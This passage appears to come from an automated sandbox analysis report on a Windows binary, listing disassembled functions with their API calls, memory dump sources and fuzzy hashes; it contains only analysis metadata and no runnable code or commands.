                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: b7ccf4ca19b26a1012b5cb9a0122367221b071fbd1c351643c0c49e7819fa2a5
                                                                                              • Instruction ID: 9bc37c947a97178ce75ddf7706502879c856d6b041c3a56a99019d8753f6a34d
                                                                                              • Opcode Fuzzy Hash: b7ccf4ca19b26a1012b5cb9a0122367221b071fbd1c351643c0c49e7819fa2a5
                                                                                              • Instruction Fuzzy Hash: 17218176604219AFDB10DFA8EC88CBF77ACFB09764B048025BD15EB191D670DD46CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A57842
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A57868
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A5786B
                                                                                              • SysAllocString.OLEAUT32 ref: 00A5788C
                                                                                              • SysFreeString.OLEAUT32 ref: 00A57895
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00A578AF
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A578BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 3922e4178b41ef2e72e50dac387480ecfdf9fa7f603fba7b7b8619e04b8eb30d
                                                                                              • Instruction ID: ca05137b8f151c9e59b2bb1ca636b49342d8b482289f288ddbf8a8d063712a98
                                                                                              • Opcode Fuzzy Hash: 3922e4178b41ef2e72e50dac387480ecfdf9fa7f603fba7b7b8619e04b8eb30d
                                                                                              • Instruction Fuzzy Hash: D5215E32608214AFDB10DBE9EC8CDAA77ACFB097617108125B915DB2A1D674DC85CB74
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A604F2
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A6052E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: 10f08911383f4e0690751a27048793b3512d2285a2513ee62608e4e5bfd562a7
                                                                                              • Instruction ID: 0e726c0754f050d0d6debb8cf81981e3e66e872b5e61482f70a2810aa96685b5
                                                                                              • Opcode Fuzzy Hash: 10f08911383f4e0690751a27048793b3512d2285a2513ee62608e4e5bfd562a7
                                                                                              • Instruction Fuzzy Hash: AB216B75500305ABDB209F69DC44E9B7BB4AF54724F208A19F8A2E62E0E7709981CF20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A605C6
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A60601
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: 00b5eb3fa966be2c4431aa5c4516c7f760327a87c4eb24402b15a6b8d4128d90
                                                                                              • Instruction ID: c18a69165651e51098891dcdf0ab335d19a69b280a07881f0a5c03c1230419f3
                                                                                              • Opcode Fuzzy Hash: 00b5eb3fa966be2c4431aa5c4516c7f760327a87c4eb24402b15a6b8d4128d90
                                                                                              • Instruction Fuzzy Hash: 2E2153795003059BDB209F69DC44E9B7BF4BF95730F204A19F8A1E72E0E7B099A1CB20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F600E: CreateWindowExW.USER32 ref: 009F604C
                                                                                                • Part of subcall function 009F600E: GetStockObject.GDI32(00000011), ref: 009F6060
                                                                                                • Part of subcall function 009F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F606A
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A84112
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A8411F
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A8412A
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A84139
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A84145
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: cdf30967be2ed94453117e01277d716c39fad54061e9fa67c5901be12f60fc96
                                                                                              • Instruction ID: 69571faacecd7fdd2e5250949ce75e8d079931723abfeaaa519068264ec84ddb
                                                                                              • Opcode Fuzzy Hash: cdf30967be2ed94453117e01277d716c39fad54061e9fa67c5901be12f60fc96
                                                                                              • Instruction Fuzzy Hash: BA1190B215021ABEEF119FA4CC85EE77F6DEF08798F014110BA18A2090CB769C219BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A2D7A3: _free.LIBCMT ref: 00A2D7CC
                                                                                              • _free.LIBCMT ref: 00A2D82D
                                                                                                • Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
                                                                                                • Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0
                                                                                              • _free.LIBCMT ref: 00A2D838
                                                                                              • _free.LIBCMT ref: 00A2D843
                                                                                              • _free.LIBCMT ref: 00A2D897
                                                                                              • _free.LIBCMT ref: 00A2D8A2
                                                                                              • _free.LIBCMT ref: 00A2D8AD
                                                                                              • _free.LIBCMT ref: 00A2D8B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                              • Instruction ID: b18e6dc8b7d7081ab7bad06bae262fd5ec21d445e3154c9ebd8dd38cc409ab27
                                                                                              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                              • Instruction Fuzzy Hash: 25115E71540B24BAD625BFB8EE47FCB7BDCAF44700F800835B2D9AA093DA69B5458760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A5DA74
                                                                                              • LoadStringW.USER32(00000000), ref: 00A5DA7B
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A5DA91
                                                                                              • LoadStringW.USER32(00000000), ref: 00A5DA98
                                                                                              • MessageBoxW.USER32 ref: 00A5DADC
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00A5DAB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 4072794657-3128320259
                                                                                              • Opcode ID: ac2dfb15796b893b2d6c60ae84a458eb57c3392aad0975c635e2deb78ef19c7b
                                                                                              • Instruction ID: 6d9efcfad8ca70109fedf49836aefa3c3caa33d1c7eb39894086837c6c994944
                                                                                              • Opcode Fuzzy Hash: ac2dfb15796b893b2d6c60ae84a458eb57c3392aad0975c635e2deb78ef19c7b
                                                                                              • Instruction Fuzzy Hash: 5B0186F29002087FE710EBE09D89EE7376CF708311F4005A2B746E6042E6749E854F74
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(00B8A3F0,00B8A3F0), ref: 00A6097B
                                                                                              • EnterCriticalSection.KERNEL32(00B8A3D0,00000000), ref: 00A6098D
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A6099B
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A609A9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A609B8
                                                                                              • InterlockedExchange.KERNEL32(00B8A3F0,000001F6), ref: 00A609C8
                                                                                              • LeaveCriticalSection.KERNEL32(00B8A3D0), ref: 00A609CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: f44eeb31df079a308d9c37150fd0ba14b542e487c629debdd768cc22d9573acb
                                                                                              • Instruction ID: d6e78666116317d93b3b66838cb82374a80336ebe19417bebccca1dbca8f69b7
                                                                                              • Opcode Fuzzy Hash: f44eeb31df079a308d9c37150fd0ba14b542e487c629debdd768cc22d9573acb
                                                                                              • Instruction Fuzzy Hash: 6BF01932442A12ABD741ABE4EE8CED6BB39FF01722F402025F202908A0D7749466CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 00A200BA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A200D6
                                                                                              • __allrem.LIBCMT ref: 00A200ED
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2010B
                                                                                              • __allrem.LIBCMT ref: 00A20122
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A20140
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                              • Instruction ID: 2fdb22f03d6386166443ecb7cb98c6a8a310e6b0086964a23c36658445668b59
                                                                                              • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                              • Instruction Fuzzy Hash: 42811572A00726AFE7249F2CDD41FAB73E9AF41364F24423AF551D7682E7B0D9418B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                                • Part of subcall function 00A7C998: CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7C9F1
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA68
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7BCCA
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A7BD25
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A7BD6A
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A7BD99
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A7BDF3
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A7BDFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                              • String ID:
                                                                                              • API String ID: 1120388591-0
                                                                                              • Opcode ID: 841f1e89b3cc34a63364ebee36b080e92aeafc3b30484917845fe090135725ff
                                                                                              • Instruction ID: 40fe4e6aab77d8fced9d3546ec3d308ce4ad177fb1fce164c504cc1aa65c7ee1
                                                                                              • Opcode Fuzzy Hash: 841f1e89b3cc34a63364ebee36b080e92aeafc3b30484917845fe090135725ff
                                                                                              • Instruction Fuzzy Hash: B0817B70218241AFD714DF24C881F2ABBE5BF84348F14C96CF5598B2A2DB31ED45CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000035), ref: 00A4F7B9
                                                                                              • SysAllocString.OLEAUT32(00000001), ref: 00A4F860
                                                                                              • VariantCopy.OLEAUT32(00A4FA64,00000000), ref: 00A4F889
                                                                                              • VariantClear.OLEAUT32(00A4FA64), ref: 00A4F8AD
                                                                                              • VariantCopy.OLEAUT32(00A4FA64,00000000), ref: 00A4F8B1
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A4F8BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                              • String ID:
                                                                                              • API String ID: 3859894641-0
                                                                                              • Opcode ID: 0c4d790d78510505e2d8d490e7dfeed76f67dd749a7011a0b4982e6162396f0a
                                                                                              • Instruction ID: 39bb7abb908ffdf3a1c212523fd22ae6cf327836e0a432c7927b0c8638f9af60
                                                                                              • Opcode Fuzzy Hash: 0c4d790d78510505e2d8d490e7dfeed76f67dd749a7011a0b4982e6162396f0a
                                                                                              • Instruction Fuzzy Hash: E351B839A00314BEDF24AF65D895B39B3A4EFC5310F24A467E905DF292DBB08C40CB56
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00A694E5
                                                                                              • _wcslen.LIBCMT ref: 00A69506
                                                                                              • _wcslen.LIBCMT ref: 00A6952D
                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00A69585
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$FileName$OpenSave
                                                                                              • String ID: X
                                                                                              • API String ID: 83654149-3081909835
                                                                                              • Opcode ID: b2e4a70b0f55985d9eaad9a73003f6347af01fc2a732d0952d948a9025bf14dc
                                                                                              • Instruction ID: 731243f3aa1641b61de335e4f0da833c1cc81f7ecf82d8edcb262f0188d52a5f
                                                                                              • Opcode Fuzzy Hash: b2e4a70b0f55985d9eaad9a73003f6347af01fc2a732d0952d948a9025bf14dc
                                                                                              • Instruction Fuzzy Hash: C7E17A716083409FD724EF24C881B6AB7F4BF85314F04896DF9999B2A2DB31ED45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              • BeginPaint.USER32(?,?), ref: 00A09241
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A092A5
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A092C2
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A092D3
                                                                                              • EndPaint.USER32(?,?), ref: 00A09321
                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A471EA
                                                                                                • Part of subcall function 00A09339: BeginPath.GDI32(00000000), ref: 00A09357
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                              • String ID:
                                                                                              • API String ID: 3050599898-0
                                                                                              • Opcode ID: 237c81c062eddb6cbd7188644f2e8c9651afd6fb87ec798c11773476aaab6611
                                                                                              • Instruction ID: 975060bf96e467f4ec033767bee3fe7f25756ccaefe5b2231cbbba17db0ee70e
                                                                                              • Opcode Fuzzy Hash: 237c81c062eddb6cbd7188644f2e8c9651afd6fb87ec798c11773476aaab6611
                                                                                              • Instruction Fuzzy Hash: 0F419074204244AFD711DF68DC84FAB7BB8EB8A720F140229F964871F2C7719846DF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A6080C
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A60847
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00A60863
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00A608DC
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A608F3
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A60921
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3368777196-0
                                                                                              • Opcode ID: 8591778980de16d153ace6dd83bd76b5c6a19885a834339bea639685a10af06a
                                                                                              • Instruction ID: 49ef9aa79034c02b1a58c5008b88ec8a53ee13fa4505c6395c53e265c66e3826
                                                                                              • Opcode Fuzzy Hash: 8591778980de16d153ace6dd83bd76b5c6a19885a834339bea639685a10af06a
                                                                                              • Instruction Fuzzy Hash: 33414A71900205EFDF14EF94ED85AAA77B9FF44310F1440A9ED00AA297D730DEA5DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A8824C
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00A88272
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A882D1
                                                                                              • ShowWindow.USER32(00000000,00000004), ref: 00A882E5
                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00A8830B
                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A8832F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
